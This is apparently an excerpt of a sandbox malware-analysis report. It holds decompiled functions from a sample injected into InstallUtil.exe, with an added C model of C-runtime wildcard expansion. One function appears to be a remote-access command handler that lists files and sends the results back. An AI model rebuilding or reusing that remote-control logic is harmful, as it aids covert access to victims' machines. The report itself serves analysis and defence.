                                                                      				signed int _t56;
                                                                      				signed int _t57;
                                                                      				intOrPtr _t59;
                                                                      				signed int _t60;
                                                                      				signed int _t62;
                                                                      				intOrPtr _t67;
                                                                      				intOrPtr _t68;
                                                                      				intOrPtr* _t70;
                                                                      				intOrPtr _t76;
                                                                      				intOrPtr _t81;
                                                                      				intOrPtr* _t83;
                                                                      				signed int _t84;
                                                                      				signed int _t87;
                                                                      
                                                                      				_t81 = __edx;
                                                                      				 *0x46cd0c =  *0x46cd0c & 0x00000000;
                                                                      				 *0x46c010 =  *0x46c010 | 1;
                                                                      				if(IsProcessorFeaturePresent(0xa) == 0) {
                                                                      					L20:
                                                                      					return 0;
                                                                      				}
                                                                      				_v20 = _v20 & 0x00000000;
                                                                      				 *0x46c010 =  *0x46c010 | 0x00000002;
                                                                      				 *0x46cd0c = 1;
                                                                      				_t83 =  &_v44;
                                                                      				_push(1);
                                                                      				asm("cpuid");
                                                                      				_pop(_t67);
                                                                      				 *_t83 = 0;
                                                                      				 *((intOrPtr*)(_t83 + 4)) = 1;
                                                                      				 *((intOrPtr*)(_t83 + 8)) = 0;
                                                                      				 *((intOrPtr*)(_t83 + 0xc)) = _t81;
                                                                      				_v12 = _v44;
                                                                      				_t51 = 1;
                                                                      				_t76 = 0;
                                                                      				_push(1);
                                                                      				asm("cpuid");
                                                                      				_pop(_t68);
                                                                      				 *_t83 = _t51;
                                                                      				 *((intOrPtr*)(_t83 + 4)) = _t67;
                                                                      				 *((intOrPtr*)(_t83 + 8)) = _t76;
                                                                      				 *((intOrPtr*)(_t83 + 0xc)) = _t81;
                                                                      				if((_v32 ^ 0x49656e69 | _v36 ^ 0x6c65746e | _v40 ^ 0x756e6547) != 0) {
                                                                      					L9:
                                                                      					_t84 =  *0x46cd10; // 0x2
                                                                      					L10:
                                                                      					_v28 = _v32;
                                                                      					_t53 = _v36;
                                                                      					_v8 = _t53;
                                                                      					_v24 = _t53;
                                                                      					if(_v12 >= 7) {
                                                                      						_t59 = 7;
                                                                      						_push(_t68);
                                                                      						asm("cpuid");
                                                                      						_t70 =  &_v44;
                                                                      						 *_t70 = _t59;
                                                                      						 *((intOrPtr*)(_t70 + 4)) = _t68;
                                                                      						 *((intOrPtr*)(_t70 + 8)) = 0;
                                                                      						 *((intOrPtr*)(_t70 + 0xc)) = _t81;
                                                                      						_t60 = _v40;
                                                                      						_v20 = _t60;
                                                                      						_t53 = _v8;
                                                                      						if((_t60 & 0x00000200) != 0) {
                                                                      							 *0x46cd10 = _t84 | 0x00000002;
                                                                      						}
                                                                      					}
                                                                      					if((_t53 & 0x00100000) != 0) {
                                                                      						 *0x46c010 =  *0x46c010 | 0x00000004;
                                                                      						 *0x46cd0c = 2;
                                                                      						if((_t53 & 0x08000000) != 0 && (_t53 & 0x10000000) != 0) {
                                                                      							asm("xgetbv");
                                                                      							_v16 = _t53;
                                                                      							_v12 = _t81;
                                                                      							if((_v16 & 0x00000006) == 6 && 0 == 0) {
                                                                      								_t56 =  *0x46c010; // 0x2f
                                                                      								_t57 = _t56 | 0x00000008;
                                                                      								 *0x46cd0c = 3;
                                                                      								 *0x46c010 = _t57;
                                                                      								if((_v20 & 0x00000020) != 0) {
                                                                      									 *0x46cd0c = 5;
                                                                      									 *0x46c010 = _t57 | 0x00000020;
                                                                      								}
                                                                      							}
                                                                      						}
                                                                      					}
                                                                      					goto L20;
                                                                      				}
                                                                      				_t62 = _v44 & 0x0fff3ff0;
                                                                      				if(_t62 == 0x106c0 || _t62 == 0x20660 || _t62 == 0x20670 || _t62 == 0x30650 || _t62 == 0x30660 || _t62 == 0x30670) {
                                                                      					_t87 =  *0x46cd10; // 0x2
                                                                      					_t84 = _t87 | 0x00000001;
                                                                      					 *0x46cd10 = _t84;
                                                                      					goto L10;
                                                                      				} else {
                                                                      					goto L9;
                                                                      				}
                                                                      			}

                                                                      APIs
                                                                      • IsProcessorFeaturePresent.KERNEL32(0000000A,00000000), ref: 004315A9
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: FeaturePresentProcessor
                                                                      • String ID:
                                                                      • API String ID: 2325560087-3916222277
                                                                      • Opcode ID: d8f0f408a1037e6a745e9f14f672f98dcfecb818b286f5e332338d316d3fa74f
                                                                      • Instruction ID: efc67b71bf89e931ff6da2cc53dc2d1280d36070dc6e1e45baae83c0375aaaea
                                                                      • Opcode Fuzzy Hash: d8f0f408a1037e6a745e9f14f672f98dcfecb818b286f5e332338d316d3fa74f
                                                                      • Instruction Fuzzy Hash: BC41C1B19002058FEB14CF99E8867AABBF4FB48354F28957BD445E7360E3B89910CF95
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 72%
                                                                      			E0044A569(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16) {
                                                                      				intOrPtr _v8;
                                                                      				signed int _v12;
                                                                      				intOrPtr* _v32;
                                                                      				CHAR* _v36;
                                                                      				signed int _v48;
                                                                      				char _v286;
                                                                      				signed int _v287;
                                                                      				struct _WIN32_FIND_DATAA _v332;
                                                                      				intOrPtr* _v336;
                                                                      				signed int _v340;
                                                                      				signed int _v344;
                                                                      				intOrPtr _v372;
                                                                      				signed int _t35;
                                                                      				signed int _t40;
                                                                      				signed int _t43;
                                                                      				intOrPtr _t45;
                                                                      				signed char _t47;
                                                                      				intOrPtr* _t55;
                                                                      				union _FINDEX_INFO_LEVELS _t57;
                                                                      				signed int _t62;
                                                                      				signed int _t65;
                                                                      				void* _t72;
                                                                      				void* _t74;
                                                                      				signed int _t75;
                                                                      				void* _t78;
                                                                      				CHAR* _t79;
                                                                      				intOrPtr* _t83;
                                                                      				intOrPtr _t85;
                                                                      				void* _t87;
                                                                      				intOrPtr* _t88;
                                                                      				signed int _t92;
                                                                      				signed int _t96;
                                                                      				void* _t101;
                                                                      				intOrPtr _t102;
                                                                      				signed int _t105;
                                                                      				union _FINDEX_INFO_LEVELS _t106;
                                                                      				void* _t111;
                                                                      				intOrPtr _t112;
                                                                      				void* _t113;
                                                                      				signed int _t118;
                                                                      				void* _t119;
                                                                      				signed int _t120;
                                                                      				void* _t121;
                                                                      				void* _t122;
                                                                      
                                                                      				_push(__ecx);
                                                                      				_t83 = _a4;
                                                                      				_t2 = _t83 + 1; // 0x1
                                                                      				_t101 = _t2;
                                                                      				do {
                                                                      					_t35 =  *_t83;
                                                                      					_t83 = _t83 + 1;
                                                                      				} while (_t35 != 0);
                                                                      				_push(__edi);
                                                                      				_t105 = _a12;
                                                                      				_t85 = _t83 - _t101 + 1;
                                                                      				_v8 = _t85;
                                                                      				if(_t85 <= (_t35 | 0xffffffff) - _t105) {
                                                                      					_push(__ebx);
                                                                      					_push(__esi);
                                                                      					_t5 = _t105 + 1; // 0x1
                                                                      					_t78 = _t5 + _t85;
                                                                      					_t111 = E00441BB3(_t85, _t78, 1);
                                                                      					_pop(_t87);
                                                                      					__eflags = _t105;
                                                                      					if(_t105 == 0) {
                                                                      						L6:
                                                                      						_push(_v8);
                                                                      						_t78 = _t78 - _t105;
                                                                      						_t40 = E0043AD93(_t87, _t111 + _t105, _t78, _a4);
                                                                      						_t120 = _t119 + 0x10;
                                                                      						__eflags = _t40;
                                                                      						if(__eflags != 0) {
                                                                      							goto L9;
                                                                      						} else {
                                                                      							_t72 = E0044A7A8(_a16, __eflags, _t111);
                                                                      							E004427C2(0);
                                                                      							_t74 = _t72;
                                                                      							goto L8;
                                                                      						}
                                                                      					} else {
                                                                      						_push(_t105);
                                                                      						_t75 = E0043AD93(_t87, _t111, _t78, _a8);
                                                                      						_t120 = _t119 + 0x10;
                                                                      						__eflags = _t75;
                                                                      						if(_t75 != 0) {
                                                                      							L9:
                                                                      							_push(0);
                                                                      							_push(0);
                                                                      							_push(0);
                                                                      							_push(0);
                                                                      							_push(0);
                                                                      							E00438659();
                                                                       							asm("int3"); /* five zero arguments into E00438659 is the shape of a non-returning invalid-parameter call; the code from here on is a separate function (per-argument expansion), merged by the decompiler */
                                                                      							_t118 = _t120;
                                                                      							_t121 = _t120 - 0x150;
                                                                      							_t43 =  *0x46c00c; // 0xe1ce05e9
                                                                      							_v48 = _t43 ^ _t118;
                                                                      							_t88 = _v32;
                                                                      							_push(_t78);
                                                                      							_t79 = _v36;
                                                                      							_push(_t111);
                                                                      							_t112 = _v332.cAlternateFileName;
                                                                      							_push(_t105);
                                                                      							_v372 = _t112;
                                                                      							while(1) {
                                                                      								__eflags = _t88 - _t79;
                                                                      								if(_t88 == _t79) {
                                                                      									break;
                                                                      								}
                                                                      								_t45 =  *_t88;
                                                                      								__eflags = _t45 - 0x2f;
                                                                      								if(_t45 != 0x2f) {
                                                                      									__eflags = _t45 - 0x5c;
                                                                      									if(_t45 != 0x5c) {
                                                                      										__eflags = _t45 - 0x3a;
                                                                      										if(_t45 != 0x3a) {
                                                                      											_t88 = E00451FF0(_t79, _t88);
                                                                      											continue;
                                                                      										}
                                                                      									}
                                                                      								}
                                                                      								break;
                                                                      							}
                                                                      							_t102 =  *_t88;
                                                                      							__eflags = _t102 - 0x3a;
                                                                      							if(_t102 != 0x3a) {
                                                                      								L19:
                                                                      								_t106 = 0;
                                                                      								__eflags = _t102 - 0x2f;
                                                                      								if(_t102 == 0x2f) {
                                                                      									L23:
                                                                      									_t47 = 1;
                                                                      									__eflags = 1;
                                                                      								} else {
                                                                      									__eflags = _t102 - 0x5c;
                                                                      									if(_t102 == 0x5c) {
                                                                      										goto L23;
                                                                      									} else {
                                                                      										__eflags = _t102 - 0x3a;
                                                                      										if(_t102 == 0x3a) {
                                                                      											goto L23;
                                                                      										} else {
                                                                      											_t47 = 0;
                                                                      										}
                                                                      									}
                                                                      								}
                                                                      								_t90 = _t88 - _t79 + 1;
                                                                      								asm("sbb eax, eax");
                                                                      								_v340 =  ~(_t47 & 0x000000ff) & _t88 - _t79 + 0x00000001;
                                                                      								E004337A0(_t106,  &_v332, _t106, 0x140);
                                                                      								_t122 = _t121 + 0xc;
                                                                       								_t113 = FindFirstFileExA(_t79, _t106, &_v332, _t106, _t106, _t106); /* _t106 == 0: FindExInfoStandard, FindExSearchNameMatch, no filter, no flags; 0x140 above is sizeof(WIN32_FIND_DATAA) */
                                                                      								_t55 = _v336;
                                                                      								__eflags = _t113 - 0xffffffff;
                                                                      								if(_t113 != 0xffffffff) {
                                                                      									_t92 =  *((intOrPtr*)(_t55 + 4)) -  *_t55;
                                                                      									__eflags = _t92;
                                                                      									_t93 = _t92 >> 2;
                                                                      									_v344 = _t92 >> 2;
                                                                      									do {
                                                                       										__eflags = _v332.cFileName - 0x2e; /* skip "." and "..": cFileName[0], then [1] (_v287) and [2] (_v286) */
                                                                      										if(_v332.cFileName != 0x2e) {
                                                                      											L36:
                                                                      											_push(_t55);
                                                                       											_t57 = E0044A569(_t79, _t93, _t106, _t113,  &(_v332.cFileName), _t79, _v340); /* not recursion: this is the first function (directory prefix + matched name appended to the list) */
                                                                      											_t122 = _t122 + 0x10;
                                                                      											__eflags = _t57;
                                                                      											if(_t57 != 0) {
                                                                      												goto L26;
                                                                      											} else {
                                                                      												goto L37;
                                                                      											}
                                                                      										} else {
                                                                      											_t93 = _v287;
                                                                      											__eflags = _t93;
                                                                      											if(_t93 == 0) {
                                                                      												goto L37;
                                                                      											} else {
                                                                      												__eflags = _t93 - 0x2e;
                                                                      												if(_t93 != 0x2e) {
                                                                      													goto L36;
                                                                      												} else {
                                                                      													__eflags = _v286;
                                                                      													if(_v286 == 0) {
                                                                      														goto L37;
                                                                      													} else {
                                                                      														goto L36;
                                                                      													}
                                                                      												}
                                                                      											}
                                                                      										}
                                                                      										goto L40;
                                                                      										L37:
                                                                      										_t62 = FindNextFileA(_t113,  &_v332);
                                                                      										__eflags = _t62;
                                                                      										_t55 = _v336;
                                                                      									} while (_t62 != 0);
                                                                      									_t103 =  *_t55;
                                                                      									_t96 = _v344;
                                                                      									_t65 =  *((intOrPtr*)(_t55 + 4)) -  *_t55 >> 2;
                                                                      									__eflags = _t96 - _t65;
                                                                      									if(_t96 != _t65) {
                                                                       										E0043A360(_t79, _t106, _t113, _t103 + _t96 * 4, _t65 - _t96, 4, E0044A3C1); /* qsort-style sort of only the entries appended during this enumeration (pointer-sized elements, comparator E0044A3C1) */
                                                                      									}
                                                                      								} else {
                                                                      									_push(_t55);
                                                                      									_t57 = E0044A569(_t79, _t90, _t106, _t113, _t79, _t106, _t106);
                                                                      									L26:
                                                                      									_t106 = _t57;
                                                                      								}
                                                                      								__eflags = _t113 - 0xffffffff;
                                                                      								if(_t113 != 0xffffffff) {
                                                                      									FindClose(_t113);
                                                                      								}
                                                                      							} else {
                                                                      								__eflags = _t88 -  &(_t79[1]);
                                                                      								if(_t88 ==  &(_t79[1])) {
                                                                      									goto L19;
                                                                      								} else {
                                                                      									_push(_t112);
                                                                      									E0044A569(_t79, _t88, 0, _t112, _t79, 0, 0);
                                                                      								}
                                                                      							}
                                                                      							__eflags = _v12 ^ _t118;
                                                                      							return E004318FB(_v12 ^ _t118);
                                                                      						} else {
                                                                      							goto L6;
                                                                      						}
                                                                      					}
                                                                      				} else {
                                                                      					_t74 = 0xc;
                                                                      					L8:
                                                                      					return _t74;
                                                                      				}
                                                                      				L40:
                                                                      			}
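The two merged routines above follow the C runtime's command-line wildcard expansion: split the argument at its last path separator, enumerate the pattern with FindFirstFileExA/FindNextFileA, drop "." and "..", prepend the directory part to every match, add the literal argument when nothing matches, and sort only the entries added by that enumeration. Recognising that shape matters when triaging a report, because this file enumeration is runtime code rather than payload logic. The following is an added, portable C model of that logic written for this page; it is not code from the sample or from Microsoft's CRT. The directory listing is a constructed in-memory array standing in for the Find* API calls (it yields "." and ".." and matches case-insensitively, as the real API does), and every function name is the editor's.

```c
#include <ctype.h>
#include <errno.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Growable argument list (stand-in for the CRT's argument list object). */
typedef struct { char **items; size_t count, capacity; } arg_list;

static int arg_list_append(arg_list *list, char *item) {
    if (list->count == list->capacity) {
        size_t cap = list->capacity ? list->capacity * 2 : 8;
        char **grown = realloc(list->items, cap * sizeof *grown);
        if (!grown) return ENOMEM;
        list->items = grown; list->capacity = cap;
    }
    list->items[list->count++] = item;
    return 0;
}

/* Model of the first decompiled routine: directory prefix + file name in a fresh
   calloc'd buffer, after the same length-overflow check the listing performs.
   Returns 0 or ENOMEM (the 0xc seen in the listing). */
int copy_and_add_argument(const char *file_name, const char *directory,
                          size_t directory_length, arg_list *out) {
    size_t name_len = strlen(file_name) + 1;            /* counts the terminator */
    if (name_len > SIZE_MAX - directory_length) return ENOMEM;
    char *buf = calloc(directory_length + 1 + name_len, 1);
    if (!buf) return ENOMEM;
    if (directory_length) memcpy(buf, directory, directory_length);
    memcpy(buf + directory_length, file_name, name_len);
    int rc = arg_list_append(out, buf);
    if (rc) free(buf);
    return rc;
}

/* Constructed listing standing in for FindFirstFileExA/FindNextFileA results. */
static const char *const listing[] = { ".", "..", "notes.txt", "b.exe", "a.exe", "readme.TXT" };

/* Case-insensitive '*' / '?' matcher, the part the Find* API does for the CRT. */
static int wild_match(const char *pat, const char *s) {
    for (; *pat; pat++, s++) {
        if (*pat == '*') {
            while (*pat == '*') pat++;
            if (!*pat) return 1;
            for (; *s; s++) if (wild_match(pat, s)) return 1;
            return 0;
        }
        if (!*s || (*pat != '?' && tolower((unsigned char)*pat) != tolower((unsigned char)*s)))
            return 0;
    }
    return *s == 0;
}

/* The "." / ".." test from the listing: cFileName[0], [1] (_v287) and [2] (_v286). */
static int is_dot_entry(const char *name) {
    return name[0] == '.' && (name[1] == 0 || (name[1] == '.' && name[2] == 0));
}

static int compare_args(const void *a, const void *b) {
    return strcmp(*(char *const *)a, *(char *const *)b);
}

/* Model of the second decompiled routine (the code after the int3). */
int expand_argument(const char *argument, arg_list *out) {
    const char *begin = argument, *it = argument + strlen(argument);
    while (it != begin && *it != '/' && *it != '\\' && *it != ':') it--;  /* last separator */
    if (*it == ':' && it != begin + 1)               /* a colon that is not "X:" -> add verbatim */
        return copy_and_add_argument(argument, NULL, 0, out);
    size_t dir_len = (*it == '/' || *it == '\\' || *it == ':') ? (size_t)(it - begin + 1) : 0;
    const char *pattern = argument + dir_len;
    size_t first_new = out->count;
    int matched = 0;
    for (size_t i = 0; i < sizeof listing / sizeof *listing; i++) {
        if (!wild_match(pattern, listing[i])) continue;
        matched = 1;
        if (is_dot_entry(listing[i])) continue;        /* the FindNextFileA skip path */
        int rc = copy_and_add_argument(listing[i], argument, dir_len, out);
        if (rc) return rc;
    }
    if (!matched)                                      /* INVALID_HANDLE_VALUE path: keep the literal */
        return copy_and_add_argument(argument, NULL, 0, out);
    if (out->count != first_new)                       /* sort only this call's additions */
        qsort(out->items + first_new, out->count - first_new, sizeof *out->items, compare_args);
    return 0;
}

/* Expand one argument into a scratch list and return item `index` (NULL if absent). */
const char *expansion_at(const char *argument, size_t index) {
    static arg_list scratch;
    for (size_t i = 0; i < scratch.count; i++) free(scratch.items[i]);
    scratch.count = 0;
    if (expand_argument(argument, &scratch) != 0) return NULL;
    return index < scratch.count ? scratch.items[index] : NULL;
}

int main(void) {
    const char *args[] = { "*.exe", "c:*.txt", "x:y:*.exe", "missing.dll" };
    for (size_t a = 0; a < 4; a++) {
        const char *s;
        for (size_t i = 0; (s = expansion_at(args[a], i)) != NULL; i++)
            printf("%-12s -> %s\n", args[a], s);
    }
    return 0;
}
```

The three branches worth noticing when reading the decompilation are all exercised here: a pattern with a drive prefix keeps "c:" on every match, an argument whose last separator is a colon elsewhere ("x:y:*.exe") is passed through untouched, and a pattern with no matches survives as a literal argument rather than disappearing.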
                                                                       Instruction addresses (the report's per-line address column for this decompilation, collapsed): 0x0044a56e to 0x0044a776, with 0x00000000 for lines that have no instruction of their own.
                                                                      0x0044a77b
                                                                      0x0044a6c1
                                                                      0x0044a6c1
                                                                      0x0044a6c5
                                                                      0x0044a6cd
                                                                      0x0044a6cd
                                                                      0x0044a6cd
                                                                      0x0044a6cf
                                                                      0x0044a6d2
                                                                      0x0044a6d5
                                                                      0x0044a6d5
                                                                      0x0044a64c
                                                                      0x0044a64f
                                                                      0x0044a651
                                                                      0x00000000
                                                                      0x0044a653
                                                                      0x0044a653
                                                                      0x0044a659
                                                                      0x0044a65e
                                                                      0x0044a651
                                                                      0x0044a6e2
                                                                      0x0044a6ed
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0044a5bb
                                                                      0x0044a58f
                                                                      0x0044a591
                                                                      0x0044a5ed
                                                                      0x0044a5f1
                                                                      0x0044a5f1
                                                                      0x00000000

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: .
                                                                      • API String ID: 0-248832578
                                                                      • Opcode ID: 855e5ffd67cf6413c4184acec50a9dad99493f472cfbe2526b57b4921a2182a2
                                                                      • Instruction ID: 37616a87b10b0f05af866122112d4014eed3d5bc4f51ad38fd421af02a543630
                                                                      • Opcode Fuzzy Hash: 855e5ffd67cf6413c4184acec50a9dad99493f472cfbe2526b57b4921a2182a2
                                                                      • Instruction Fuzzy Hash: F7313571840208BFEB248E78CC84EFB7BBDDB85308F0401AEF859D7251E6389E508B55
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 91%
                                                                      			E0044DD0C(void* __ecx, void* __edx, char _a4) {
                                                                      				void* __ebx;
                                                                      				void* __ebp;
                                                                      				intOrPtr _t26;
                                                                      				intOrPtr _t29;
                                                                      				signed int _t32;
                                                                      				signed char _t33;
                                                                      				signed char _t34;
                                                                      				void* _t36;
                                                                      				intOrPtr* _t39;
                                                                      				intOrPtr* _t42;
                                                                      				signed int _t48;
                                                                      				void* _t51;
                                                                      				void* _t52;
                                                                      				signed int* _t53;
                                                                      				void* _t54;
                                                                      				signed int _t62;
                                                                      
                                                                      				_t54 = E00444255(_t36, __ecx, __edx);
                                                                      				_t48 = 2;
                                                                      				_t39 =  *((intOrPtr*)(_t54 + 0x50));
                                                                      				_t51 = _t39 + 2;
                                                                      				do {
                                                                      					_t26 =  *_t39;
                                                                      					_t39 = _t39 + _t48;
                                                                      				} while (_t26 != 0);
                                                                      				_t42 =  *((intOrPtr*)(_t54 + 0x54));
                                                                      				 *(_t54 + 0x60) = 0 | _t39 - _t51 >> 0x00000001 == 0x00000003;
                                                                      				_t52 = _t42 + 2;
                                                                      				do {
                                                                      					_t29 =  *_t42;
                                                                      					_t42 = _t42 + _t48;
                                                                      				} while (_t29 != 0);
                                                                      				_t8 =  &_a4; // 0x44e461
                                                                      				_t53 =  *_t8;
                                                                      				 *(_t54 + 0x64) = 0 | _t42 - _t52 >> 0x00000001 == 0x00000003;
                                                                      				_t53[1] = 0;
                                                                      				if( *(_t54 + 0x60) == 0) {
                                                                      					_t48 = E0044DE08( *((intOrPtr*)(_t54 + 0x50)));
                                                                      				}
                                                                      				 *(_t54 + 0x5c) = _t48;
                                                                      				_t32 = EnumSystemLocalesW(E0044DE34, 1);
                                                                      				_t62 =  *_t53 & 0x00000007;
                                                                      				asm("bt ecx, 0x9");
                                                                      				_t33 = _t32 & 0xffffff00 | _t62 > 0x00000000;
                                                                      				asm("bt ecx, 0x8");
                                                                      				_t34 = _t33 & 0xffffff00 | _t62 > 0x00000000;
                                                                      				if((_t34 & (_t48 & 0xffffff00 | _t62 != 0x00000000) & _t33) == 0) {
                                                                      					 *_t53 = 0;
                                                                      					return _t34;
                                                                      				}
                                                                      				return _t34;
                                                                      			}

                                                                      APIs
                                                                        • Part of subcall function 00444255: GetLastError.KERNEL32(?,0043DA65,00437135,0043DA65,0046E278,?,0043B7CA,FF8BC35D,0046E278,0046E278), ref: 00444259
                                                                        • Part of subcall function 00444255: _free.LIBCMT ref: 0044428C
                                                                        • Part of subcall function 00444255: SetLastError.KERNEL32(00000000,FF8BC35D,0046E278,0046E278), ref: 004442CD
                                                                        • Part of subcall function 00444255: _abort.LIBCMT ref: 004442D3
                                                                      • EnumSystemLocalesW.KERNEL32(0044DE34,00000001,00000000,?,00440B2C,?,0044E461,00000000,?,?,?), ref: 0044DD7E
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                      • String ID: aD
                                                                      • API String ID: 1084509184-45356255
                                                                      • Opcode ID: 3ecafb8d9185c3743efaea55cb0e12e4db6744239c8b4da06d348465cc1ba71e
                                                                      • Instruction ID: eb3055dd26bff70a051a26feb185d0fbee26ebf88123d7282749a628f911e3c3
                                                                      • Opcode Fuzzy Hash: 3ecafb8d9185c3743efaea55cb0e12e4db6744239c8b4da06d348465cc1ba71e
                                                                      • Instruction Fuzzy Hash: 5E112977A007055FEB189F39D89167ABB91FFC0358B14442DE9464BB40D775B942C744
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 90%
                                                                      			E004162EF(char* __edx, void* __eflags, char _a8) {
                                                                      				struct _WIN32_FIND_DATAW _v1028;
                                                                      				char _v1036;
                                                                      				char _v1064;
                                                                      				char _v1088;
                                                                      				void* _v1092;
                                                                      				char _v1100;
                                                                      				char _v1116;
                                                                      				void* _v1120;
                                                                      				char _v1128;
                                                                      				char _v1136;
                                                                      				char _v1152;
                                                                      				char _v1156;
                                                                      				char _v1160;
                                                                      				void* _v1164;
                                                                      				char _v1172;
                                                                      				char _v1176;
                                                                      				void* _v1188;
                                                                      				char _v1196;
                                                                      				void* _v1200;
                                                                      				void* _v1204;
                                                                      				char _v1208;
                                                                      				char _v1220;
                                                                      				char _v1224;
                                                                      				char _v1228;
                                                                      				char _v1232;
                                                                      				char _v1236;
                                                                      				char _v1240;
                                                                      				char _v1252;
                                                                      				void* __ebx;
                                                                      				void* __esi;
                                                                      				void* __ebp;
                                                                      				intOrPtr* _t63;
                                                                      				int _t85;
                                                                      				int _t91;
                                                                      				void* _t102;
                                                                      				void* _t109;
                                                                      				char* _t113;
                                                                      				void* _t115;
                                                                      				void* _t116;
                                                                      				void* _t130;
                                                                      				void* _t133;
                                                                      				void* _t228;
                                                                      				void* _t229;
                                                                      				void* _t234;
                                                                      				signed int _t235;
                                                                      				void* _t238;
                                                                      				void* _t239;
                                                                      				void* _t240;
                                                                      				void* _t243;
                                                                      
                                                                      				_t243 = __eflags;
                                                                      				_t213 = __edx;
                                                                      				_push(_t139);
                                                                      				_t63 = E00401F6B( &_a8);
                                                                      				E00404162( &_a8,  &_v1100, 4, 0xffffffff);
                                                                      				_t238 = (_t235 & 0xfffffff8) - 0x4b4;
                                                                      				E004020B6(_t139, _t238, __edx, _t243, 0x46e260);
                                                                      				_t239 = _t238 - 0x18;
                                                                      				E004020B6(_t139, _t239, __edx, _t243,  &_v1116);
                                                                      				E0041851D( &_v1252, _t213);
                                                                      				_t240 = _t239 + 0x30;
                                                                      				_t228 =  *_t63 - 0x19;
                                                                      				if(_t228 == 0) {
                                                                      					E0040209F(_t139,  &_v1220);
                                                                      					_t213 = 0x46e968;
                                                                      					E004078F9( &_v1172, 0x46e968, _t234, L"\\*");
                                                                      					_t229 = FindFirstFileW(E00401EC4( &_v1172),  &_v1028);
                                                                      					__eflags = _t229 - 0xffffffff;
                                                                      					if(__eflags == 0) {
                                                                      						L14:
                                                                      						E004020B6(_t139, _t240 - 0x18, _t213, __eflags,  &_v1220);
                                                                      						_push(0x5d);
                                                                      						E00404A78(0x46eb00, _t213, __eflags);
                                                                      						E00401EC9();
                                                                      						E00401F98();
                                                                      						goto L15;
                                                                      					}
                                                                      					E0040413E(_t139,  &_v1196, 0x46e968, _t234,  &(_v1028.cFileName));
                                                                      					_t213 = ".";
                                                                      					_t85 = E004078C9(__eflags);
                                                                      					_t139 = _t85;
                                                                      					E00401EC9();
                                                                      					__eflags = _t85;
                                                                      					if(__eflags != 0) {
                                                                      						E00401FA2( &_v1228, ".", _t229, E00402077(_t139,  &_v1196, ".", _t234, __eflags,  &_v1028, 0x250));
                                                                      						E00401F98();
                                                                      					}
                                                                      					while(1) {
                                                                      						__eflags = FindNextFileW(_t229,  &_v1028);
                                                                      						if(__eflags == 0) {
                                                                      							goto L14;
                                                                      						}
                                                                      						E0040413E(_t139,  &_v1196, _t213, _t234,  &(_v1028.cFileName));
                                                                      						_t213 = L"..";
                                                                      						_t91 = E004078C9(__eflags);
                                                                      						_t139 = _t91;
                                                                      						E00401EC9();
                                                                      						__eflags = _t91;
                                                                      						if(__eflags != 0) {
                                                                      							L00403336(E00402077(_t139,  &_v1196, L"..", _t234, __eflags,  &_v1028, 0x250));
                                                                      							E00401F98();
                                                                      						}
                                                                      					}
                                                                      					goto L14;
                                                                      				} else {
                                                                      					_t245 = _t228 == 1;
                                                                      					if(_t228 == 1) {
                                                                      						_t102 = E00418385( &_v1152, E00401E25( &_v1232, _t213, _t234, _t245, 1));
                                                                      						E00402F65( &_v1176, E004078F9( &_v1128, 0x46e968, _t234, "\\"), _t102);
                                                                      						E00401EC9();
                                                                      						E00401EC9();
                                                                      						E0040209F(_t139,  &_v1224);
                                                                      						E00401EC4( &_v1176);
                                                                      						_t213 =  &_v1224;
                                                                      						_t109 = E004189A5( &_v1224);
                                                                      						_t246 = _t109;
                                                                      						if(_t109 != 0) {
                                                                      							_t113 = E00401F6B(E00401E25(0x46e600,  &_v1224, _t234, _t246, 0x1b));
                                                                      							_t247 =  *_t113 - 1;
                                                                      							if( *_t113 == 1) {
                                                                      								_t130 = E0040243C();
                                                                      								E00405AE8( &_v1028, E00401F6B(0x46e5e8), _t130);
                                                                      								_t133 = E0040243C();
                                                                      								E00401FA2( &_v1240, _t213, 0x46e5e8, E00405C09(_t139,  &_v1036, _t213,  &_v1156, E00401F6B( &_v1228), _t133));
                                                                      								E00401F98();
                                                                      							}
                                                                      							_t115 = E00401E25( &_v1232, _t213, _t234, _t247, 2);
                                                                      							_t116 = E00401E25( &_v1236, _t213, _t234, _t247, 0);
                                                                      							_t213 = E00402ED0(_t139,  &_v1160, E00402ED0(_t139,  &_v1136, E00402ED0(_t139,  &_v1088, E00402ED0(_t139,  &_v1064, E00402EF1( &_v1208, E00401E25( &_v1240, _t213, _t234, _t247, 1), _t234, 0x46e260), _t234, _t247, _t116), _t234, _t247, 0x46e260), _t234, _t247, _t115), _t234, _t247, 0x46e260);
                                                                      							E00402ED0(_t139, _t240 - 0x18, _t122, _t234, _t247,  &_v1220);
                                                                      							_push(0x5e);
                                                                      							E00404A78(0x46eb00, _t122, _t247);
                                                                      							E00401F98();
                                                                      							E00401F98();
                                                                      							E00401F98();
                                                                      							E00401F98();
                                                                      							E00401F98();
                                                                      						}
                                                                      						E00401F98();
                                                                      						E00401EC9();
                                                                      					}
                                                                      					L15:
                                                                      					E00401E4D( &_v1232, _t213);
                                                                      					E00401F98();
                                                                      					return E00401F98();
